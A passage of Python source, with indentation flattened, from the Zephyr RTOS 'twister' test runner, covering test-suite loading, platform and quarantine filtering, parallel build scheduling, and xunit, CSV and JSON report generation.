overlays.append(match.group(1).strip('\'"'))
else:
other_args.append(arg)
args[:] = other_args
return overlays
overlays = extract_overlays(args)
if os.path.exists(os.path.join(instance.build_dir,
"twister", "testcase_extra.conf")):
overlays.append(os.path.join(instance.build_dir,
"twister", "testcase_extra.conf"))
if overlays:
args.append("OVERLAY_CONFIG=\"%s\"" % (" ".join(overlays)))
res = self.run_cmake(args)
return res
def build(self):
res = self.run_build(['--build', self.build_dir])
return res
def run(self):
instance = self.instance
if instance.handler:
if instance.handler.type_str == "device":
instance.handler.suite = self.suite
instance.handler.handle()
sys.stdout.flush()
class TestSuite(DisablePyTestCollectionMixin):
config_re = re.compile('(CONFIG_[A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
dt_re = re.compile('([A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
tc_schema = scl.yaml_load(
os.path.join(ZEPHYR_BASE,
"scripts", "schemas", "twister", "testcase-schema.yaml"))
quarantine_schema = scl.yaml_load(
os.path.join(ZEPHYR_BASE,
"scripts", "schemas", "twister", "quarantine-schema.yaml"))
testcase_valid_keys = {"tags": {"type": "set", "required": False},
"type": {"type": "str", "default": "integration"},
"extra_args": {"type": "list"},
"extra_configs": {"type": "list"},
"build_only": {"type": "bool", "default": False},
"build_on_all": {"type": "bool", "default": False},
"skip": {"type": "bool", "default": False},
"slow": {"type": "bool", "default": False},
"timeout": {"type": "int", "default": 60},
"min_ram": {"type": "int", "default": 8},
"depends_on": {"type": "set"},
"min_flash": {"type": "int", "default": 32},
"arch_allow": {"type": "set"},
"arch_exclude": {"type": "set"},
"extra_sections": {"type": "list", "default": []},
"integration_platforms": {"type": "list", "default": []},
"platform_exclude": {"type": "set"},
"platform_allow": {"type": "set"},
"toolchain_exclude": {"type": "set"},
"toolchain_allow": {"type": "set"},
"filter": {"type": "str"},
"harness": {"type": "str"},
"harness_config": {"type": "map", "default": {}}
}
RELEASE_DATA = os.path.join(ZEPHYR_BASE, "scripts", "release",
"twister_last_release.csv")
SAMPLE_FILENAME = 'sample.yaml'
TESTCASE_FILENAME = 'testcase.yaml'
def __init__(self, board_root_list=[], testcase_roots=[], outdir=None):
self.roots = testcase_roots
if not isinstance(board_root_list, list):
self.board_roots = [board_root_list]
else:
self.board_roots = board_root_list
# Testsuite Options
self.coverage_platform = []
self.build_only = False
self.cmake_only = False
self.cleanup = False
self.enable_slow = False
self.device_testing = False
self.fixtures = []
self.enable_coverage = False
self.enable_ubsan = False
self.enable_lsan = False
self.enable_asan = False
self.enable_valgrind = False
self.extra_args = []
self.inline_logs = False
self.enable_sizes_report = False
self.west_flash = None
self.west_runner = None
self.generator = None
self.generator_cmd = None
self.warnings_as_errors = True
self.overflow_as_errors = False
self.quarantine_verify = False
# Keep track of which test cases we've filtered out and why
self.testcases = {}
self.quarantine = {}
self.platforms = []
self.platform_names = []
self.selected_platforms = []
self.filtered_platforms = []
self.default_platforms = []
self.outdir = os.path.abspath(outdir)
self.discards = {}
self.load_errors = 0
self.instances = dict()
self.total_platforms = 0
self.start_time = 0
self.duration = 0
self.warnings = 0
# hardcoded for now
self.duts = []
# run integration tests only
self.integration = False
# used during creating shorter build paths
self.link_dir_counter = 0
self.pipeline = None
self.version = "NA"
def check_zephyr_version(self):
try:
subproc = subprocess.run(["git", "describe", "--abbrev=12"],
stdout=subprocess.PIPE,
universal_newlines=True,
cwd=ZEPHYR_BASE)
if subproc.returncode == 0:
self.version = subproc.stdout.strip()
logger.info(f"Zephyr version: {self.version}")
except OSError:
logger.info("Cannot read zephyr version.")
def get_platform_instances(self, platform):
filtered_dict = {k:v for k,v in self.instances.items() if k.startswith(platform + os.sep)}
return filtered_dict
def config(self):
logger.info("coverage platform: {}".format(self.coverage_platform))
# Debug Functions
@staticmethod
def info(what):
sys.stdout.write(what + "\n")
sys.stdout.flush()
def update_counting(self, results=None, initial=False):
results.skipped_configs = 0
results.skipped_cases = 0
for instance in self.instances.values():
if initial:
results.cases += len(instance.testcase.cases)
if instance.status == 'skipped':
results.skipped_configs += 1
results.skipped_cases += len(instance.testcase.cases)
elif instance.status == "passed":
results.passed += 1
for res in instance.results.values():
if res == 'SKIP':
results.skipped_cases += 1
def compare_metrics(self, filename):
# name, datatype, lower results better
interesting_metrics = [("ram_size", int, True),
("rom_size", int, True)]
if not os.path.exists(filename):
logger.error("Cannot compare metrics, %s not found" % filename)
return []
results = []
saved_metrics = {}
with open(filename) as fp:
cr = csv.DictReader(fp)
for row in cr:
d = {}
for m, _, _ in interesting_metrics:
d[m] = row[m]
saved_metrics[(row["test"], row["platform"])] = d
for instance in self.instances.values():
mkey = (instance.testcase.name, instance.platform.name)
if mkey not in saved_metrics:
continue
sm = saved_metrics[mkey]
for metric, mtype, lower_better in interesting_metrics:
if metric not in instance.metrics:
continue
if sm[metric] == "":
continue
delta = instance.metrics.get(metric, 0) - mtype(sm[metric])
if delta == 0:
continue
results.append((instance, metric, instance.metrics.get(metric, 0), delta,
lower_better))
return results
def footprint_reports(self, report, show_footprint, all_deltas,
footprint_threshold, last_metrics):
if not report:
return
logger.debug("running footprint_reports")
deltas = self.compare_metrics(report)
warnings = 0
if deltas and show_footprint:
for i, metric, value, delta, lower_better in deltas:
if not all_deltas and ((delta < 0 and lower_better) or
(delta > 0 and not lower_better)):
continue
percentage = 0
if value > delta:
percentage = (float(delta) / float(value - delta))
if not all_deltas and (percentage < (footprint_threshold / 100.0)):
continue
logger.info("{:<25} {:<60} {}{}{}: {} {:<+4}, is now {:6} {:+.2%}".format(
i.platform.name, i.testcase.name, Fore.YELLOW,
"INFO" if all_deltas else "WARNING", Fore.RESET,
metric, delta, value, percentage))
warnings += 1
if warnings:
logger.warning("Deltas based on metrics from last %s" %
("release" if not last_metrics else "run"))
def summary(self, results, unrecognized_sections):
failed = 0
run = 0
for instance in self.instances.values():
if instance.status == "failed":
failed += 1
elif instance.metrics.get("unrecognized") and not unrecognized_sections:
logger.error("%sFAILED%s: %s has unrecognized binary sections: %s" %
(Fore.RED, Fore.RESET, instance.name,
str(instance.metrics.get("unrecognized", []))))
failed += 1
if instance.metrics.get('handler_time', None):
run += 1
if results.total and results.total != results.skipped_configs:
pass_rate = (float(results.passed) / float(results.total - results.skipped_configs))
else:
pass_rate = 0
logger.info(
"{}{} of {}{} test configurations passed ({:.2%}), {}{}{} failed, {} skipped with {}{}{} warnings in {:.2f} seconds".format(
Fore.RED if failed else Fore.GREEN,
results.passed,
results.total - results.skipped_configs,
Fore.RESET,
pass_rate,
Fore.RED if results.failed else Fore.RESET,
results.failed,
Fore.RESET,
results.skipped_configs,
Fore.YELLOW if self.warnings else Fore.RESET,
self.warnings,
Fore.RESET,
self.duration))
self.total_platforms = len(self.platforms)
# if we are only building, do not report about tests being executed.
if self.platforms and not self.build_only:
logger.info("In total {} test cases were executed, {} skipped on {} out of total {} platforms ({:02.2f}%)".format(
results.cases - results.skipped_cases,
results.skipped_cases,
len(self.filtered_platforms),
self.total_platforms,
(100 * len(self.filtered_platforms) / len(self.platforms))
))
logger.info(f"{Fore.GREEN}{run}{Fore.RESET} test configurations executed on platforms, \
{Fore.RED}{results.total - run - results.skipped_configs}{Fore.RESET} test configurations were only built.")
def save_reports(self, name, suffix, report_dir, no_update, release, only_failed, platform_reports, json_report):
if not self.instances:
return
logger.info("Saving reports...")
if name:
report_name = name
else:
report_name = "twister"
if report_dir:
os.makedirs(report_dir, exist_ok=True)
filename = os.path.join(report_dir, report_name)
outdir = report_dir
else:
filename = os.path.join(self.outdir, report_name)
outdir = self.outdir
if suffix:
filename = "{}_{}".format(filename, suffix)
if not no_update:
self.xunit_report(filename + ".xml", full_report=False,
append=only_failed, version=self.version)
self.xunit_report(filename + "_report.xml", full_report=True,
append=only_failed, version=self.version)
self.csv_report(filename + ".csv")
if json_report:
self.json_report(filename + ".json", append=only_failed, version=self.version)
if platform_reports:
self.target_report(outdir, suffix, append=only_failed)
if self.discards:
self.discard_report(filename + "_discard.csv")
if release:
self.csv_report(self.RELEASE_DATA)
def add_configurations(self):
for board_root in self.board_roots:
board_root = os.path.abspath(board_root)
logger.debug("Reading platform configuration files under %s..." %
board_root)
for file in glob.glob(os.path.join(board_root, "*", "*", "*.yaml")):
try:
platform = Platform()
platform.load(file)
if platform.name in [p.name for p in self.platforms]:
logger.error(f"Duplicate platform {platform.name} in {file}")
raise Exception(f"Duplicate platform identifier {platform.name} found")
if platform.twister:
self.platforms.append(platform)
if platform.default:
self.default_platforms.append(platform.name)
except RuntimeError as e:
logger.error("E: %s: can't load: %s" % (file, e))
self.load_errors += 1
self.platform_names = [p.name for p in self.platforms]
def get_all_tests(self):
tests = []
for _, tc in self.testcases.items():
for case in tc.cases:
tests.append(case)
return tests
@staticmethod
def get_toolchain():
toolchain_script = Path(ZEPHYR_BASE) / Path('cmake/modules/verify-toolchain.cmake')
result = CMake.run_cmake_script([toolchain_script, "FORMAT=json"])
try:
if result['returncode']:
raise TwisterRuntimeError(f"E: {result['returnmsg']}")
except Exception as e:
print(str(e))
sys.exit(2)
toolchain = json.loads(result['stdout'])['ZEPHYR_TOOLCHAIN_VARIANT']
logger.info(f"Using '{toolchain}' toolchain.")
return toolchain
def add_testcases(self, testcase_filter=[]):
for root in self.roots:
root = os.path.abspath(root)
logger.debug("Reading test case configuration files under %s..." % root)
for dirpath, _, filenames in os.walk(root, topdown=True):
if self.SAMPLE_FILENAME in filenames:
filename = self.SAMPLE_FILENAME
elif self.TESTCASE_FILENAME in filenames:
filename = self.TESTCASE_FILENAME
else:
continue
logger.debug("Found possible test case in " + dirpath)
tc_path = os.path.join(dirpath, filename)
try:
parsed_data = TwisterConfigParser(tc_path, self.tc_schema)
parsed_data.load()
tc_path = os.path.dirname(tc_path)
workdir = os.path.relpath(tc_path, root)
for name in parsed_data.tests.keys():
tc = TestCase(root, workdir, name)
tc_dict = parsed_data.get_test(name, self.testcase_valid_keys)
tc.source_dir = tc_path
tc.yamlfile = tc_path
tc.type = tc_dict["type"]
tc.tags = tc_dict["tags"]
tc.extra_args = tc_dict["extra_args"]
tc.extra_configs = tc_dict["extra_configs"]
tc.arch_allow = tc_dict["arch_allow"]
tc.arch_exclude = tc_dict["arch_exclude"]
tc.skip = tc_dict["skip"]
tc.platform_exclude = tc_dict["platform_exclude"]
tc.platform_allow = tc_dict["platform_allow"]
tc.toolchain_exclude = tc_dict["toolchain_exclude"]
tc.toolchain_allow = tc_dict["toolchain_allow"]
tc.tc_filter = tc_dict["filter"]
tc.timeout = tc_dict["timeout"]
tc.harness = tc_dict["harness"]
tc.harness_config = tc_dict["harness_config"]
if tc.harness == 'console' and not tc.harness_config:
raise Exception('Harness config error: console harness defined without a configuration.')
tc.build_only = tc_dict["build_only"]
tc.build_on_all = tc_dict["build_on_all"]
tc.slow = tc_dict["slow"]
tc.min_ram = tc_dict["min_ram"]
tc.depends_on = tc_dict["depends_on"]
tc.min_flash = tc_dict["min_flash"]
tc.extra_sections = tc_dict["extra_sections"]
tc.integration_platforms = tc_dict["integration_platforms"]
tc.parse_subcases(tc_path)
if testcase_filter:
if tc.name and tc.name in testcase_filter:
self.testcases[tc.name] = tc
else:
self.testcases[tc.name] = tc
except Exception as e:
logger.error("%s: can't load (skipping): %s" % (tc_path, e))
self.load_errors += 1
return len(self.testcases)
def get_platform(self, name):
selected_platform = None
for platform in self.platforms:
if platform.name == name:
selected_platform = platform
break
return selected_platform
def load_quarantine(self, file):
"""
Loads quarantine list from the given yaml file. Creates a dictionary
of all tests configurations (platform + scenario: comment) that shall be
skipped due to quarantine
"""
# Load yaml into quarantine_yaml
quarantine_yaml = scl.yaml_load_verify(file, self.quarantine_schema)
# Create quarantine_list with a product of the listed
# platforms and scenarios for each entry in quarantine yaml
quarantine_list = []
for quar_dict in quarantine_yaml:
if quar_dict['platforms'][0] == "all":
plat = self.platform_names
else:
plat = quar_dict['platforms']
comment = quar_dict.get('comment', "NA")
quarantine_list.append([{".".join([p, s]): comment}
for p in plat for s in quar_dict['scenarios']])
# Flatten the quarantine_list
quarantine_list = [it for sublist in quarantine_list for it in sublist]
# Change quarantine_list into a dictionary
for d in quarantine_list:
self.quarantine.update(d)
def load_from_file(self, file, filter_status=[], filter_platform=[]):
try:
with open(file, "r") as fp:
cr = csv.DictReader(fp)
instance_list = []
for row in cr:
if row["status"] in filter_status:
continue
test = row["test"]
platform = self.get_platform(row["platform"])
if filter_platform and platform.name not in filter_platform:
continue
instance = TestInstance(self.testcases[test], platform, self.outdir)
if self.device_testing:
tfilter = 'runnable'
else:
tfilter = 'buildable'
instance.run = instance.check_runnable(
self.enable_slow,
tfilter,
self.fixtures
)
instance.create_overlay(platform, self.enable_asan, self.enable_ubsan, self.enable_coverage, self.coverage_platform)
instance_list.append(instance)
self.add_instances(instance_list)
except KeyError as e:
logger.error("Key error while parsing tests file.({})".format(str(e)))
sys.exit(2)
except FileNotFoundError as e:
logger.error("Couldn't find input file with list of tests. ({})".format(e))
sys.exit(2)
def apply_filters(self, **kwargs):
toolchain = self.get_toolchain()
discards = {}
platform_filter = kwargs.get('platform')
exclude_platform = kwargs.get('exclude_platform', [])
testcase_filter = kwargs.get('run_individual_tests', [])
arch_filter = kwargs.get('arch')
tag_filter = kwargs.get('tag')
exclude_tag = kwargs.get('exclude_tag')
all_filter = kwargs.get('all')
runnable = kwargs.get('runnable')
force_toolchain = kwargs.get('force_toolchain')
force_platform = kwargs.get('force_platform')
emu_filter = kwargs.get('emulation_only')
logger.debug("platform filter: " + str(platform_filter))
logger.debug(" arch_filter: " + str(arch_filter))
logger.debug(" tag_filter: " + str(tag_filter))
logger.debug(" exclude_tag: " + str(exclude_tag))
default_platforms = False
emulation_platforms = False
if all_filter:
logger.info("Selecting all possible platforms per test case")
# When --all used, any --platform arguments ignored
platform_filter = []
elif not platform_filter and not emu_filter:
logger.info("Selecting default platforms per test case")
default_platforms = True
elif emu_filter:
logger.info("Selecting emulation platforms per test case")
emulation_platforms = True
if platform_filter:
self.verify_platforms_existence(platform_filter, f"platform_filter")
platforms = list(filter(lambda p: p.name in platform_filter, self.platforms))
elif emu_filter:
platforms = list(filter(lambda p: p.simulation != 'na', self.platforms))
elif arch_filter:
platforms = list(filter(lambda p: p.arch in arch_filter, self.platforms))
elif default_platforms:
platforms = list(filter(lambda p: p.default, self.platforms))
else:
platforms = self.platforms
logger.info("Building initial testcase list...")
for tc_name, tc in self.testcases.items():
if tc.build_on_all and not platform_filter:
platform_scope = self.platforms
elif tc.integration_platforms and self.integration:
self.verify_platforms_existence(
tc.integration_platforms, f"{tc_name} - integration_platforms")
platform_scope = list(filter(lambda item: item.name in tc.integration_platforms, \
self.platforms))
else:
platform_scope = platforms
integration = self.integration and tc.integration_platforms
# If there isn't any overlap between the platform_allow list and the platform_scope
# we set the scope to the platform_allow list
if tc.platform_allow and not platform_filter and not integration:
self.verify_platforms_existence(
tc.platform_allow, f"{tc_name} - platform_allow")
a = set(platform_scope)
b = set(filter(lambda item: item.name in tc.platform_allow, self.platforms))
c = a.intersection(b)
if not c:
platform_scope = list(filter(lambda item: item.name in tc.platform_allow, \
self.platforms))
# list of instances per testcase, aka configurations.
instance_list = []
for plat in platform_scope:
instance = TestInstance(tc, plat, self.outdir)
if runnable:
tfilter = 'runnable'
else:
tfilter = 'buildable'
instance.run = instance.check_runnable(
self.enable_slow,
tfilter,
self.fixtures
)
for t in tc.cases:
instance.results[t] = None
if runnable and self.duts:
for h in self.duts:
if h.platform == plat.name:
if tc.harness_config.get('fixture') in h.fixtures:
instance.run = True
if not force_platform and plat.name in exclude_platform:
discards[instance] = discards.get(instance, "Platform is excluded on command line.")
if (plat.arch == "unit") != (tc.type == "unit"):
# Discard silently
continue
if runnable and not instance.run:
discards[instance] = discards.get(instance, "Not runnable on device")
if self.integration and tc.integration_platforms and plat.name not in tc.integration_platforms:
discards[instance] = discards.get(instance, "Not part of integration platforms")
if tc.skip:
discards[instance] = discards.get(instance, "Skip filter")
if tag_filter and not tc.tags.intersection(tag_filter):
discards[instance] = discards.get(instance, "Command line testcase tag filter")
if exclude_tag and tc.tags.intersection(exclude_tag):
discards[instance] = discards.get(instance, "Command line testcase exclude filter")
if testcase_filter and tc_name not in testcase_filter:
discards[instance] = discards.get(instance, "Testcase name filter")
if arch_filter and plat.arch not in arch_filter:
discards[instance] = discards.get(instance, "Command line testcase arch filter")
if not force_platform:
if tc.arch_allow and plat.arch not in tc.arch_allow:
discards[instance] = discards.get(instance, "Not in test case arch allow list")
if tc.arch_exclude and plat.arch in tc.arch_exclude:
discards[instance] = discards.get(instance, "In test case arch exclude")
if tc.platform_exclude and plat.name in tc.platform_exclude:
discards[instance] = discards.get(instance, "In test case platform exclude")
if tc.toolchain_exclude and toolchain in tc.toolchain_exclude:
discards[instance] = discards.get(instance, "In test case toolchain exclude")
if platform_filter and plat.name not in platform_filter:
discards[instance] = discards.get(instance, "Command line platform filter")
if tc.platform_allow and plat.name not in tc.platform_allow:
discards[instance] = discards.get(instance, "Not in testcase platform allow list")
if tc.toolchain_allow and toolchain not in tc.toolchain_allow:
discards[instance] = discards.get(instance, "Not in testcase toolchain allow list")
if not plat.env_satisfied:
discards[instance] = discards.get(instance, "Environment ({}) not satisfied".format(", ".join(plat.env)))
if not force_toolchain \
and toolchain and (toolchain not in plat.supported_toolchains) \
and "host" not in plat.supported_toolchains \
and tc.type != 'unit':
discards[instance] = discards.get(instance, "Not supported by the toolchain")
if plat.ram < tc.min_ram:
discards[instance] = discards.get(instance, "Not enough RAM")
if tc.depends_on:
dep_intersection = tc.depends_on.intersection(set(plat.supported))
if dep_intersection != set(tc.depends_on):
discards[instance] = discards.get(instance, "No hardware support")
if plat.flash < tc.min_flash:
discards[instance] = discards.get(instance, "Not enough FLASH")
if set(plat.ignore_tags) & tc.tags:
discards[instance] = discards.get(instance, "Excluded tags per platform (exclude_tags)")
if plat.only_tags and not set(plat.only_tags) & tc.tags:
discards[instance] = discards.get(instance, "Excluded tags per platform (only_tags)")
test_configuration = ".".join([instance.platform.name,
instance.testcase.id])
# skip quarantined tests
if test_configuration in self.quarantine and not self.quarantine_verify:
discards[instance] = discards.get(instance,
f"Quarantine: {self.quarantine[test_configuration]}")
# run only quarantined test to verify their statuses (skip everything else)
if self.quarantine_verify and test_configuration not in self.quarantine:
discards[instance] = discards.get(instance, "Not under quarantine")
# if nothing stopped us until now, it means this configuration
# needs to be added.
instance_list.append(instance)
# no configurations, so jump to next testcase
if not instance_list:
continue
# if twister was launched with no platform options at all, we
# take all default platforms
if default_platforms and not tc.build_on_all and not integration:
if tc.platform_allow:
a = set(self.default_platforms)
b = set(tc.platform_allow)
c = a.intersection(b)
if c:
aa = list(filter(lambda tc: tc.platform.name in c, instance_list))
self.add_instances(aa)
else:
self.add_instances(instance_list)
else:
instances = list(filter(lambda tc: tc.platform.default, instance_list))
self.add_instances(instances)
elif integration:
instances = list(filter(lambda item: item.platform.name in tc.integration_platforms, instance_list))
self.add_instances(instances)
elif emulation_platforms:
self.add_instances(instance_list)
for instance in list(filter(lambda inst: not inst.platform.simulation != 'na', instance_list)):
discards[instance] = discards.get(instance, "Not an emulated platform")
else:
self.add_instances(instance_list)
for _, case in self.instances.items():
case.create_overlay(case.platform, self.enable_asan, self.enable_ubsan, self.enable_coverage, self.coverage_platform)
self.discards = discards
self.selected_platforms = set(p.platform.name for p in self.instances.values())
remove_from_discards = [] # configurations to be removed from discards.
for instance in self.discards:
instance.reason = self.discards[instance]
# If integration mode is on all skips on integration_platforms are treated as errors.
if self.integration and instance.platform.name in instance.testcase.integration_platforms \
and "Quarantine" not in instance.reason:
instance.status = "error"
instance.reason += " but is one of the integration platforms"
instance.fill_results_by_status()
self.instances[instance.name] = instance
# Such configuration has to be removed from discards to make sure it won't get skipped
remove_from_discards.append(instance)
else:
instance.status = "skipped"
instance.fill_results_by_status()
self.filtered_platforms = set(p.platform.name for p in self.instances.values()
if p.status != "skipped" )
# Remove from discards configururations that must not be discarded (e.g. integration_platforms when --integration was used)
for instance in remove_from_discards:
del self.discards[instance]
return discards
def add_instances(self, instance_list):
for instance in instance_list:
self.instances[instance.name] = instance
@staticmethod
def calc_one_elf_size(instance):
if instance.status not in ["error", "failed", "skipped"]:
if instance.platform.type != "native":
size_calc = instance.calculate_sizes()
instance.metrics["ram_size"] = size_calc.get_ram_size()
instance.metrics["rom_size"] = size_calc.get_rom_size()
instance.metrics["unrecognized"] = size_calc.unrecognized_sections()
else:
instance.metrics["ram_size"] = 0
instance.metrics["rom_size"] = 0
instance.metrics["unrecognized"] = []
instance.metrics["handler_time"] = instance.handler.duration if instance.handler else 0
def add_tasks_to_queue(self, pipeline, build_only=False, test_only=False):
for instance in self.instances.values():
if build_only:
instance.run = False
if instance.status not in ['passed', 'skipped', 'error']:
logger.debug(f"adding {instance.name}")
instance.status = None
if test_only and instance.run:
pipeline.put({"op": "run", "test": instance})
else:
pipeline.put({"op": "cmake", "test": instance})
# If the instance got 'error' status before, proceed to the report stage
if instance.status == "error":
pipeline.put({"op": "report", "test": instance})
def pipeline_mgr(self, pipeline, done_queue, lock, results):
while True:
try:
task = pipeline.get_nowait()
except queue.Empty:
break
else:
test = task['test']
pb = ProjectBuilder(self,
test,
lsan=self.enable_lsan,
asan=self.enable_asan,
ubsan=self.enable_ubsan,
coverage=self.enable_coverage,
extra_args=self.extra_args,
device_testing=self.device_testing,
cmake_only=self.cmake_only,
cleanup=self.cleanup,
valgrind=self.enable_valgrind,
inline_logs=self.inline_logs,
generator=self.generator,
generator_cmd=self.generator_cmd,
verbose=self.verbose,
warnings_as_errors=self.warnings_as_errors,
overflow_as_errors=self.overflow_as_errors
)
pb.process(pipeline, done_queue, task, lock, results)
return True
def execute(self, pipeline, done, results):
lock = Lock()
logger.info("Adding tasks to the queue...")
self.add_tasks_to_queue(pipeline, self.build_only, self.test_only)
logger.info("Added initial list of jobs to queue")
processes = []
for job in range(self.jobs):
logger.debug(f"Launch process {job}")
p = Process(target=self.pipeline_mgr, args=(pipeline, done, lock, results, ))
processes.append(p)
p.start()
try:
for p in processes:
p.join()
except KeyboardInterrupt:
logger.info("Execution interrupted")
for p in processes:
p.terminate()
# FIXME: This needs to move out.
if self.enable_size_report and not self.cmake_only:
# Parallelize size calculation
executor = concurrent.futures.ThreadPoolExecutor(self.jobs)
futures = [executor.submit(self.calc_one_elf_size, instance)
for instance in self.instances.values()]
concurrent.futures.wait(futures)
else:
for instance in self.instances.values():
instance.metrics["ram_size"] = 0
instance.metrics["rom_size"] = 0
instance.metrics["handler_time"] = instance.handler.duration if instance.handler else 0
instance.metrics["unrecognized"] = []
return results
def discard_report(self, filename):
try:
if not self.discards:
raise TwisterRuntimeError("apply_filters() hasn't been run!")
except Exception as e:
logger.error(str(e))
sys.exit(2)
with open(filename, "wt") as csvfile:
fieldnames = ["test", "arch", "platform", "reason"]
cw = csv.DictWriter(csvfile, fieldnames, lineterminator=os.linesep)
cw.writeheader()
for instance, reason in sorted(self.discards.items()):
rowdict = {"test": instance.testcase.name,
"arch": instance.platform.arch,
"platform": instance.platform.name,
"reason": reason}
cw.writerow(rowdict)
def target_report(self, outdir, suffix, append=False):
platforms = {inst.platform.name for _, inst in self.instances.items()}
for platform in platforms:
if suffix:
filename = os.path.join(outdir,"{}_{}.xml".format(platform, suffix))
else:
filename = os.path.join(outdir,"{}.xml".format(platform))
self.xunit_report(filename, platform, full_report=True,
append=append, version=self.version)
@staticmethod
def process_log(log_file):
filtered_string = ""
if os.path.exists(log_file):
with open(log_file, "rb") as f:
log = f.read().decode("utf-8")
filtered_string = ''.join(filter(lambda x: x in string.printable, log))
return filtered_string
def xunit_report(self, filename, platform=None, full_report=False, append=False, version="NA"):
total = 0
fails = passes = errors = skips = 0
if platform:
selected = [platform]
logger.info(f"Writing target report for {platform}...")
else:
logger.info(f"Writing xunit report {filename}...")
selected = self.selected_platforms
if os.path.exists(filename) and append:
tree = ET.parse(filename)
eleTestsuites = tree.getroot()
else:
eleTestsuites = ET.Element('testsuites')
for p in selected:
inst = self.get_platform_instances(p)
fails = 0
passes = 0
errors = 0
skips = 0
duration = 0
for _, instance in inst.items():
handler_time = instance.metrics.get('handler_time', 0)
duration += handler_time
if full_report and instance.run:
for k in instance.results.keys():
if instance.results[k] == 'PASS':
passes += 1
elif instance.results[k] == 'BLOCK':
errors += 1
elif instance.results[k] == 'SKIP' or instance.status in ['skipped']:
skips += 1
else:
fails += 1
else:
if instance.status in ["error", "failed", "timeout", "flash_error"]:
if instance.reason in ['build_error', 'handler_crash']:
errors += 1
else:
fails += 1
elif instance.status == 'skipped':
skips += 1
elif instance.status == 'passed':
passes += 1
else:
if instance.status:
logger.error(f"{instance.name}: Unknown status {instance.status}")
else:
logger.error(f"{instance.name}: No status")
total = (errors + passes + fails + skips)
# do not produce a report if no tests were actually run (only built)
if total == 0:
continue
run = p
eleTestsuite = None
# When we re-run the tests, we re-use the results and update only with
# the newly run tests.
if os.path.exists(filename) and append:
ts = eleTestsuites.findall(f'testsuite/[@name="{p}"]')
if ts:
eleTestsuite = ts[0]
eleTestsuite.attrib['failures'] = "%d" % fails
eleTestsuite.attrib['errors'] = "%d" % errors
eleTestsuite.attrib['skipped'] = "%d" % skips
else:
logger.info(f"Did not find any existing results for {p}")
eleTestsuite = ET.SubElement(eleTestsuites, 'testsuite',
name=run, time="%f" % duration,
tests="%d" % (total),
failures="%d" % fails,
errors="%d" % (errors), skipped="%s" % (skips))
eleTSPropetries = ET.SubElement(eleTestsuite, 'properties')
# Multiple 'property' can be added to 'properties'
# differing by name and value
ET.SubElement(eleTSPropetries, 'property', name="version", value=version)
else:
eleTestsuite = ET.SubElement(eleTestsuites, 'testsuite',
name=run, time="%f" % duration,
tests="%d" % (total),
failures="%d" % fails,
errors="%d" % (errors), skipped="%s" % (skips))
eleTSPropetries = ET.SubElement(eleTestsuite, 'properties')
# Multiple 'property' can be added to 'properties'
# differing by name and value
ET.SubElement(eleTSPropetries, 'property', name="version", value=version)
for _, instance in inst.items():
if full_report:
tname = os.path.basename(instance.testcase.name)
else:
tname = instance.testcase.id
handler_time = instance.metrics.get('handler_time', 0)
if full_report:
for k in instance.results.keys():
# remove testcases that are being re-run from exiting reports
for tc in eleTestsuite.findall(f'testcase/[@name="{k}"]'):
eleTestsuite.remove(tc)
classname = ".".join(tname.split(".")[:2])
eleTestcase = ET.SubElement(
eleTestsuite, 'testcase',
classname=classname,
name="%s" % (k), time="%f" % handler_time)
if instance.results[k] in ['FAIL', 'BLOCK'] or \
(not instance.run and instance.status in ["error", "failed", "timeout"]):
if instance.results[k] == 'FAIL':
el = ET.SubElement(
eleTestcase,
'failure',
type="failure",
message="failed")
else:
el = ET.SubElement(
eleTestcase,
'error',
type="failure",
message=instance.reason)
log_root = os.path.join(self.outdir, instance.platform.name, instance.testcase.name)
log_file = os.path.join(log_root, "handler.log")
el.text = self.process_log(log_file)
elif instance.results[k] == 'PASS' \
or (not instance.run and instance.status in ["passed"]):
pass
elif instance.results[k] == 'SKIP' or (instance.status in ["skipped"]):
el = ET.SubElement(eleTestcase, 'skipped', type="skipped", message=instance.reason)
else:
el = ET.SubElement(
eleTestcase,
'error',
type="error",
message=f"{instance.reason}")
else:
if platform:
classname = ".".join(instance.testcase.name.split(".")[:2])
else:
classname = p + ":" + ".".join(instance.testcase.name.split(".")[:2])
# remove testcases that are being re-run from exiting reports
for tc in eleTestsuite.findall(f'testcase/[@classname="{classname}"][@name="{instance.testcase.name}"]'):
eleTestsuite.remove(tc)
eleTestcase = ET.SubElement(eleTestsuite, 'testcase',
classname=classname,
name="%s" % (instance.testcase.name),
time="%f" % handler_time)
if instance.status in ["error", "failed", "timeout", "flash_error"]:
failure = ET.SubElement(
eleTestcase,
'failure',
type="failure",
message=instance.reason)
log_root = ("%s/%s/%s" % (self.outdir, instance.platform.name, instance.testcase.name))
bl = os.path.join(log_root, "build.log")
hl = os.path.join(log_root, "handler.log")
log_file = bl
if instance.reason != 'Build error':
if os.path.exists(hl):
log_file = hl
else:
log_file = bl
failure.text = self.process_log(log_file)
elif instance.status == "skipped":
ET.SubElement(eleTestcase, 'skipped', type="skipped", message="Skipped")
result = ET.tostring(eleTestsuites)
with open(filename, 'wb') as report:
report.write(result)
return fails, passes, errors, skips
def csv_report(self, filename):
with open(filename, "wt") as csvfile:
fieldnames = ["test", "arch", "platform", "status",
"extra_args", "handler", "handler_time", "ram_size",
"rom_size"]
cw = csv.DictWriter(csvfile, fieldnames, lineterminator=os.linesep)
cw.writeheader()
for instance in self.instances.values():
rowdict = {"test": instance.testcase.name,
"arch": instance.platform.arch,
"platform": instance.platform.name,
"extra_args": " ".join(instance.testcase.extra_args),
"handler": instance.platform.simulation}
rowdict["status"] = instance.status
if instance.status not in ["error", "failed", "timeout"]:
if instance.handler:
rowdict["handler_time"] = instance.metrics.get("handler_time", 0)
ram_size = instance.metrics.get("ram_size", 0)
rom_size = instance.metrics.get("rom_size", 0)
rowdict["ram_size"] = ram_size
rowdict["rom_size"] = rom_size
cw.writerow(rowdict)
def json_report(self, filename, append=False, version="NA"):
logger.info(f"Writing JSON report {filename}")
report = {}
selected = self.selected_platforms
report["environment"] = {"os": os.name,
"zephyr_version": version,
"toolchain": self.get_toolchain()
}
json_data = {}
if os.path.exists(filename) and append:
with open(filename, 'r') as json_file:
json_data = json.load(json_file)
suites = json_data.get("testsuites", [])
if suites:
suite = suites[0]
testcases = suite.get("testcases", [])
else:
suite = {}
testcases = []
for p in selected:
inst = self.get_platform_instances(p)
for _, instance in inst.items():
testcase = {}
handler_log = os.path.join(instance.build_dir, "handler.log")
build_log = os.path.join(instance.build_dir, "build.log")
device_log = os.path.join(instance.build_dir, "device.log")
